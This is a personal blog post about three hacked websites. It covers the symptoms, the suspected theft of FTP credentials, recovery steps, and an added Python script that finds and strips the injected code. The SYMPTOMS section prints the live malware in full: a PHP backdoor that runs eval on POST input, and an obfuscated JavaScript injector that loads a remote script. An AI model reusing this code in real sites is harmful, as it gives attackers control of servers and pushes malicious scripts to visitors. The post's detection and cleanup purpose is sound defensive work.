
My sites were hacked last week (This may help if it happens to you)
This happened last week and it took me a good 3 days to get things back to normal. My sites were hacked. Not one, not two but three!
In this post, I'll share with you what caused it, what I did to recover the sites, and what I did to prevent it from happening.
If you are in a hurry, here are the takeaways:
- backup your sites on a regular basis
- scan your PC with anti-virus and anti-spyware software regularly
I hope by sharing with you this story, you will know what to do if it happens to you (touch wood!?)
Here's the story.
SYMPTOMS
- My sites were down with this error:
Parse error: syntax error, unexpected T_VARIABLE in /home/hosting/public_html/index.php on line 1
- Upon checking, most of the main PHP, HTML and JavaScript files are altered. The following lines are appended in the top section of PHP pages:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NUUHNTc2NyU3NpZE5wdE5KbiUyMGNNN3NkNktyY1RQJTNEJTJGTkpuJTJGOWNNNzRUUCUyRTI0N1RQJTJFMiUyRTFOSm45Y003NSUyRmNNN2pxdWVkTnJTc3klMkVjTTdqc0hZJTNFJTNDJTJGU3NzVFBjdXZqcmlwdXZqdFNzJTNFJykucmVwbGFjZSgvVFB8TkpufEhZfHV2anxkTnxTc3xkNkt8Y003L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1]; } if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
The following code is appended at the bottom of HTML and JS (JavaScript) pages:
<!--
document.write(unescape('%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9cM75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E').replace(/TP|NJn|HY|uvj|dN|Ss|d6K|cM7/g,""));
-->
- If you look closely, the files that have been hacked/changed carry the same timestamp (same date and time). I believe the hackers used a program to make the changes.
- Three of my websites were hacked, and coincidentally these are the sites I had uploaded to using the FTP client Filezilla the night before. I suspect the hackers were using a keylogger/spyware to steal my FTP logins. Then, using the info they stole, they logged in to my sites and appended the above code to my pages.
(NOTE: It was later confirmed that FTP communication was the cause, as I tried updating a site using Filezilla and sure enough the site was hacked again the next day. The other two sites that were updated with online FTP are intact.)
- I searched on the Internet and found that many people have experienced the same problem, but no solution was found.
Step 1:
There are two possible causes. Either your web server or your computer is hacked. Before you do anything, use Avira or Spybot S&D - free (www.safer-networking.org) to detect and remove any possible spyware from your computer.
You may want to scan your computer on a regular basis from now on.
Step 2:
Make sure you change your FTP passwords in cPanel first, before anything else. To be sure, I use online FTP (http://www.net2ftp.com) instead of Filezilla to edit/upload/rename files. I don't want my new passwords to be stolen via FTP communications again.
NOTE: There's a daily limit on transfer volume when you use Net2FTP. However, you can install net2ftp on your server.
Then take one of the steps below:
Step One: Do A Restore
- Depending on your webhost, you can either do a restore of your website yourself or you have to ask the Support team to do it for you. In this step, you want to revert your website to the day before the site was hacked.
- If you don't have a backup from cPanel or your webhost, you have no choice but to do this. This is the most time-consuming one. By using a web based FTP client, upload all clean HTML and PHP pages (without the funny codes as shown above) from your own backup on your PC to your server. Of course, provided you have a mirror copy of your web pages.
- If you don't, do this: Edit the affected files directly using Net2FTP.com online by removing the extra codes.
I still find that using Net2FTP to download files to the desktop, editing them with Dreamweaver, and then uploading them back to the server using Net2FTP is faster.
- For MySQL databases, I am not sure if I need to make any changes to rectify this problem. It seems that it's not affected.
- Try NOT to use Filezilla to avoid passwords being stolen again by hackers.
- Scan your computer using Spybot or Lavasoft (for anti-virus, do not use AVG Free, use Avira instead). Install a firewall to protect your computer from being attacked by spyware or viruses.
- Backup your website on a regular basis using cPanel. Do a backup as and when you have made changes. You can also use a WordPress plugin to automate the backup process. When your site is hacked, backups come in very handy. You will be very glad that you did.
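The "edit the affected files by removing the extra codes" step above is tedious by hand across three sites, and the same-timestamp observation from the SYMPTOMS section is easy to check mechanically. The script below is an added example written for this post, not the author's own tooling: it walks a web root, flags files carrying either of the two fragments quoted above (the PHP prefix guarded by function_exists('tmp_lkojfghx') and the HTML/JS trailer wrapping document.write(unescape(...).replace(...))), groups the hits by modification time, and strips the fragments in place while keeping a .bak copy. The sample files it builds in a temp directory are constructed stand-ins with the same shape as the quoted fragments, not the real payload; the regexes, file names and the latin-1 round-tripping are this example's own choices.

```python
"""Scan a web root for the injection quoted in the post and strip it (added example)."""
import os
import re
import tempfile
from collections import defaultdict

# PHP prefix: from the function_exists guard up to the closing "tmp_lkojfghx2(); ?>".
PHP_BLOCK_RE = re.compile(
    r"<\?php\s*if\(!function_exists\('tmp_lkojfghx'\)\).*?tmp_lkojfghx2\(\);\s*\?>\s*",
    re.DOTALL,
)
# HTML/JS trailer, optionally wrapped in the <script language=javascript> tag that the
# PHP output handler emits when it injects the same payload into served pages.
JS_BLOCK_RE = re.compile(
    r"(?:<script language=javascript>)?<!--\s*"
    r"document\.write\(unescape\('[^']*'\)\.replace\(/[^/]*/g,\s*\"\"\)\);\s*"
    r"-->\s*(?:</script>)?\s*",
    re.DOTALL,
)
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js"}

# Constructed samples (not the real payload): same shape as the post's fragments.
INJECTED_PHP = (
    "<?php if(!function_exists('tmp_lkojfghx')){"
    "function tmp_lkojfghx($s){return $s;}function tmp_lkojfghx2(){}}"
    "tmp_lkojfghx2(); ?>\n"
)
INJECTED_JS = "<!--\ndocument.write(unescape('%3Cscript%3E').replace(/TP|NJn/g,\"\"));\n-->\n"
CLEAN_PHP = "<?php\necho 'hello';\n"
CLEAN_HTML = "<html><body>hi</body></html>\n"


def find_injections(text):
    """Return the names of the injected fragments present in text."""
    found = []
    if PHP_BLOCK_RE.search(text):
        found.append("php-prefix")
    if JS_BLOCK_RE.search(text):
        found.append("js-trailer")
    return found


def clean_text(text):
    """Strip both fragments; return (cleaned_text, number_of_fragments_removed)."""
    cleaned, n_php = PHP_BLOCK_RE.subn("", text)
    cleaned, n_js = JS_BLOCK_RE.subn("", cleaned)
    return cleaned, n_php + n_js


def scan_tree(root):
    """Map each injected file under root to (mtime in whole seconds, fragments found)."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            # latin-1 maps every byte to one code point, so read/write round-trips
            # non-UTF-8 files unchanged and cleaning cannot corrupt them.
            with open(path, encoding="latin-1") as fh:
                frags = find_injections(fh.read())
            if frags:
                hits[path] = (int(os.path.getmtime(path)), frags)
    return hits


def group_by_mtime(hits):
    """Bucket hits by modification time: the post notes every altered file carried
    the same timestamp, so one large bucket marks the automated sweep."""
    groups = defaultdict(list)
    for path, (mtime, _frags) in hits.items():
        groups[mtime].append(path)
    return dict(groups)


def clean_tree(root, dry_run=True):
    """Strip the fragments in place, keeping a .bak copy; return the paths cleaned."""
    cleaned = []
    for path in scan_tree(root):
        with open(path, encoding="latin-1") as fh:
            original = fh.read()
        new_text, removed = clean_text(original)
        if removed == 0:
            continue
        if not dry_run:
            with open(path + ".bak", "w", encoding="latin-1") as fh:
                fh.write(original)
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(new_text)
        cleaned.append(path)
    return cleaned


def demo():
    """Build a constructed web root, scan, clean, rescan; return (flagged, cleaned, left)."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "index.php": INJECTED_PHP + CLEAN_PHP,
            "about.html": CLEAN_HTML + INJECTED_JS,
            "contact.php": CLEAN_PHP,     # untouched file, must not be flagged
            "css/style.css": "body{}\n",  # extension not scanned
        }
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(body)
        before = scan_tree(root)
        print("mtime buckets:", group_by_mtime(before))
        cleaned = clean_tree(root, dry_run=False)
        return len(before), len(cleaned), len(scan_tree(root))


if __name__ == "__main__":
    print(demo())  # (2, 2, 0)
```

Run it with dry_run=True first against a copy of the site so you see the list of flagged files and their mtime buckets before anything is rewritten; a bucket that holds every PHP and HTML file with one identical timestamp is the pattern described under SYMPTOMS. Restoring from a known-clean backup is still the better route when one exists, because a regex cleaner only removes the fragments it knows about.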
Latest WSO: Health & Fitness PLR
Others: Dating PLR|Twitter PLR |Weight Loss PLR Product Reviews Conduit Style